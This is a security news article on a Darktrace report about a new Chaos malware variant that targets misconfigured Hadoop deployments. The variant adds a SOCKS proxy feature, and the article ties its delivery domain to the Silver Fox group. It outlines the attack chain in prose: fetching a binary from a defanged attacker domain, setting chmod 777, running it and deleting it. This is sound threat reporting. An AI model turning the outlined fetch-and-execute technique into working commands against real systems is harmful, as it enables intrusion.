Cybersecurity researchers have discovered a new variant of the **Chaos** malware that's capable of hitting misconfigured cloud deployments, marking an expansion of the botnet's targeting infrastructure. "Chaos malware is increasingly targeting misconfigured cloud deployments, expanding beyond its traditional focus on routers and edge devices," **Darktrace** said in a new report. ### Chaos: An Overview **Chaos** was first documented by **Lumen Black Lotus Labs** in September 2022. It's a cross-platform malware capable of targeting Windows and Linux environments. Its capabilities include running remote shell commands, dropping additional modules, propagating to other hosts by brute-forcing SSH keys, mining cryptocurrency, and launching distributed denial-of-service (DDoS) attacks via HTTP, TLS, TCP, UDP, and WebSocket. The malware is assessed to be an evolution of another DDoS malware known as **Kaiji** that has singled out misconfigured Docker instances. The actor behind this operation is currently unknown, but the presence of Chinese language characters and the use of China-based infrastructure suggest that the threat actor could be of Chinese origin. ### Targeting Hadoop Deployments **Darktrace** identified the new variant targeting its honeypot network last month, specifically a deliberately misconfigured Hadoop instance that enables remote code execution on the service. The attack commenced with an HTTP request to the Hadoop deployment to create a new application. The application embedded a sequence of shell commands to retrieve a **Chaos** agent binary from an attacker-controlled server ("pan.tenire[.]com"), set permissions to allow all users to read, modify, or run it ("chmod 777"), and then execute the binary and delete the artifact from disk to minimize the forensic trail. ### Connection to Silver Fox Interestingly, the domain used in the attack was previously associated with an email phishing campaign carried out by the Chinese cybercrime group **Silver Fox** to deliver decoy documents and ValleyRAT malware. This campaign was codenamed Operation Silk Lure by **Seqrite Labs** in October 2025. ### Updated Capabilities The 64-bit ELF binary is a restructured and updated version of **Chaos** that reworks several of its functions, while keeping most of its core feature set intact. A significant change is the removal of functions that enabled it to spread via SSH and exploit router vulnerabilities. Taking their place is a new SOCKS proxy feature that allows the compromised system to be used for ferrying traffic, thereby concealing the true origins of malicious activity and making it harder for defenders to detect and block the attack. "In addition, several functions that were previously believed to be inherited from **Kaiji** have also been changed, suggesting that the threat actors have either rewritten the malware or refactored it extensively," **Darktrace** added. ### Monetization and Future Threats The addition of the proxy feature suggests that the threat actors behind the malware are looking to further monetize the botnet beyond cryptocurrency mining and DDoS-for-hire, and keep up with their competitors in the cybercrime market by offering a diverse slate of illicit services. "While Chaos is not a new malware, its continued evolution highlights the dedication of cybercriminals to expand their botnets and enhance the capabilities at their disposal," **Darktrace** concluded. "The recent shift in botnets such as AISURU and Chaos to include proxy services as core features demonstrates that denial-of-service is no longer the only risk these botnets pose to organizations and their security teams."